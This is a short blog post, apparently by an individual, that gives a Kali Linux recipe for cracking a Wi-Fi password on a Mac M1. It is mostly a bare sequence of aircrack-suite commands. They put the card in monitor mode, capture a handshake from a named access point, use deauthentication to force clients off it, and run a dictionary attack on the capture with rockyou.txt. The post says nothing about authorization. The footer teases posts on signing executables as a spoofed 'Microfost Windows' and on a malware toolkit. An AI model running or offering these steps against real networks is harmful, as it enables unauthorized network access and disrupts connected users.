top of page
  • Writer's pictureTimmy TSENG

Use MacM1 Kali to crack wifi password (MacM1 Kali Crack WIFI)




Pre-preparation: Install Parallel and Kali on Mac M1

Buy good wifi equipment: https://www.alfa.com.tw/collections/kali-linux-compatible

The relevant instructions are as follows:

View the network card name ip addr

View wlan0 usage mode Iwconfig

Enable monitoring mode airmon-ng start wlan0

Find the current wifi traffic information airodump-ng wlan0mon

Save the collected packets as data and execute to obtain the four-way handshake verification packet

airodump-ng -w data -c 6 --bssid A2:1C:EA:95:6B:91 wlan0mon

Disconnect the connected device aireplay-ng --deauth 0 -a A2:1C:EA:95:6B:91 wlan0mon

Use dictionary file to blast aircrack-ng data-w /usr/share/wordlists/rockyou.txt




0 views0 comments

Recent Posts

See All

Windows adds a digital signature to exe

Generate a self-signed root certificate makecert -n "CN=Microfost Windows" -r -sv Root.pvk Root.cer This command uses the makecert tool to create a self-signed root certificate with the certificate na

AMON-Eye: Advanced Malware Toolkit

Overview In today's digital world, cyber threats have become increasingly serious, and malware attacks have posed a huge threat to the data security of organizations and individuals. Cobaltstrike is a

bottom of page